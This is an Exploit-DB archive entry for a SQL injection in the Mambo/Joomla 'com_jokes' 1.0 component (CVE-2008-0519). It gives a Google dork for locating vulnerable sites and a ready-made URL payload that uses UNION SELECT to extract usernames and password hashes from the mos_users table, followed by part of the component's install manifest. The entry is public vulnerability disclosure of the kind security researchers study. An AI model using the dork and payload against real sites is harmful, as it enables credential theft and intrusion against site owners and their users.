Mambo Component jokes 1.0 - 'cat' SQL Injection

EDB-ID:

5015

CVE:

2008-0519

EDB Verified:

Author:

S@BUN

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-01-30

Vulnerable App:

#########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*

#########################################################################
# S@BUN                    www.hackturkiye.com                        S@BUN
#########################################################################
# S@BUN                             GOOD LUCKY                        S@BUN
#########################################################################


  <mosinstall type="component">
    <name>jokes</name>
    <creationDate>29/12/2005</creationDate>
    <author>Atapin</author>
    <copyright>Released under the GNU/GPL License</copyright>
    <authorEmail>info@atapin.net</authorEmail>

    <authorUrl>www.atapin.net</authorUrl>
    <version>1.0</version>
    <description></description>

# milw0rm.com [2008-01-30]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services